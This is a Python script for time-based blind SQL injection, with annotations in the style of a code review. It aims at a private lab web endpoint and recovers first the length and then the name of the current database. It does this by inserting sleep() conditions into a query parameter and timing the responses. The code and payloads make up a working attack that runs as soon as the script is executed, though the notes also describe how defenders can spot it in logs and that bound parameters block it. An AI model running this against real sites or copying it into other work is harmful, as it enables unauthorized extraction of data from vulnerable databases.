#!D:\Typora\python
import requests
import time
import datetime
# Get the length of the current database name (time-based check).
def database_len():
    """Estimate the length of the current database name from response latency.

    One GET is sent per candidate length 1..14 to the lab endpoint. Each
    request carries a conditional ``sleep(1)`` in the ``type`` parameter, and
    a round trip longer than one second is treated as a match. Matching
    candidates are added to a running total, which is printed on every match.
    The loop does not stop at the first match, so any additional slow
    response (network jitter, a busy server) inflates the printed value.

    Defender's view: these requests stand out in access logs through
    ``sleep(`` and ``length(database())`` in the query string, and through a
    burst of near-identical GETs from one client with one slow outlier.
    NOTE(review): the probe only yields a signal if the endpoint places
    ``type`` into SQL text unescaped -- presumably the case in this lab;
    binding the value as a query parameter removes the signal.

    Returns:
        None. Results are only printed.
    """
    # Accumulates every candidate length whose request came back slow.
    total = 0
    print("start get length...")
    candidate = 1
    while candidate < 15:
        # The timer starts before the URL is built, as in the original.
        began = time.time()
        probe_url = "http://172.20.10.14/pentest/test/time/?type=1 and if(length(database())=%d,sleep(1),1)" % (candidate)
        # The response body is never inspected; only the elapsed time matters.
        requests.get(probe_url)
        if time.time() - began > 1:
            total += candidate
            print("the length :", str(total))
        candidate += 1
    # NOTE(review): the page lost its indentation; this print is assumed to
    # run once, after the probe loop has finished.
    print("start database sql injection...")
# Executed as soon as the script is run or imported: the length probes are
# sent to the lab host immediately, with no command-line switch or prompt.
database_len()
# Get the current database name (time-based check, one character at a time).
def database_name():
    """Recover the current database name character by character via latency.

    For each position 1..14, every character of a fixed charset (digits and
    lowercase letters only) is sent in a ``substr(database(), pos, 1)``
    comparison that triggers ``sleep(2)`` on equality. A request whose
    elapsed whole seconds reach 2 is taken as a match: the character is
    appended, the partial name is printed, and the scan moves to the next
    position. A position where no character matches adds nothing to the
    name. The upper bound of 15 is a hand-tuned guess at the name length.

    Defender's view: up to 36 requests per position, each with ``substr(``
    and ``sleep(`` in ``type`` and ending in ``%23``, form a very regular
    pattern in web-server or WAF logs. NOTE(review): as with the length
    probe, this presumably relies on the lab endpoint concatenating ``type``
    into the SQL statement; a bound parameter would not be evaluated as an
    expression.

    Returns:
        None. The partial and final names are only printed.
    """
    base = '''http://172.20.10.14/pentest/test/time/'''
    charset = '0123456789abcdefghijklmnopqrstuvwxyz'
    recovered = ''
    position = 1
    # Adjust the bound 15 to match the length of the database name.
    while position < 15:
        for ch in charset:
            query = '''?type=if(substr(database(),%d,1)='%s',sleep(2),1)''' % (
                position, ch)
            sent_at = datetime.datetime.now()
            # '%23' is a URL-encoded '#'; appended after the payload.
            requests.get(base + query + '%23')
            waited = datetime.datetime.now() - sent_at
            # `.seconds` is the whole-second component of the elapsed time.
            if waited.seconds < 2:
                continue
            recovered += ch
            print(recovered)
            break
        position += 1
    print('database_name:', recovered)
# Executed at script start, after the length probe above: sends the
# per-character probes to the lab host and prints the recovered name.
database_name()
SQL盲注python脚本源码